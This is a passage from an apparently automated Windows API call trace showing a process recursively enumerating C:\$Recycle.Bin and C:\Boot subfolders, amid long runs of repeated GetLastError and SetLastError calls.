SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] GetLastError () returned 0x0 [0132.673] SetLastError (dwErrCode=0x0) [0132.673] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2287a78 [0132.674] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa284b8 [0132.674] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.674] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] GetLastError () returned 0x0 [0132.674] SetLastError (dwErrCode=0x0) [0132.674] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x2297a80 [0132.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.675] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.675] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.675] SetLastError (dwErrCode=0x0) [0132.675] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.676] SetLastError (dwErrCode=0x0) [0132.676] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.677] GetLastError () returned 0x0 [0132.677] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.678] SetLastError (dwErrCode=0x0) [0132.678] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.679] GetLastError () returned 0x0 [0132.679] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.680] SetLastError (dwErrCode=0x0) [0132.680] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.681] GetLastError () returned 0x0 [0132.681] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.682] SetLastError (dwErrCode=0x0) [0132.682] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.683] SetLastError (dwErrCode=0x0) [0132.683] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] GetLastError () returned 0x0 [0132.684] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.685] SetLastError (dwErrCode=0x0) [0132.685] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] SetEvent (hEvent=0x108) returned 1 [0132.686] ResetEvent (hEvent=0x10c) returned 1 [0132.686] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.686] SetLastError (dwErrCode=0x0) [0132.686] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.687] SetLastError (dwErrCode=0x0) [0132.687] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.688] SetLastError (dwErrCode=0x0) [0132.688] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.689] SetLastError (dwErrCode=0x0) [0132.689] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.690] GetLastError () returned 0x0 [0132.690] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.691] GetLastError () returned 0x0 [0132.691] SetLastError (dwErrCode=0x0) [0132.692] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.692] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.692] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0 [0132.692] FindClose (in: hFindFile=0xa284b8 | out: hFindFile=0xa284b8) returned 1 [0132.692] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0132.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa284b8 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.692] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.693] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.693] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.693] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.693] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.693] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.693] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.693] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.694] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.694] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.694] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.694] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.694] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.694] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.694] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.694] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.695] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.695] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.695] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.695] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.695] FindNextFileW (in: 